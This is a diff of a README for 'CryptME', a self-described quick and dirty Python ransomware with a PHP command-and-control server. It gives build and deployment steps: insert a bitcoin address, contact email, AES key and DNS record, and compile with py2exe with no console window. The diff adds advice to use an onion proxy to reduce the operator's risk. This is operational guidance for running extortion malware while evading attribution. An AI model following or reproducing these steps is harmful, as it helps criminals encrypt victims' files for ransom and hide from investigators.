X1pe0/CME/README.md

 CryptME quick and dirty ransomware in python with a C2 Server, currently a work in progress.
 Apache/Nginx with PHP support.

 Adjust main.py and C2 with bitcoin address, contact email, AES key, and DNS A record to reach server.
-Then build setup.py with py2exe
+(Try and use an onion proxy to minimize risk) Then build setup.py with py2exe.

 (Recommended to use the params setup(windows=['main.py'], options={"py2exe":{"includes":["sip"]}}) for no console window)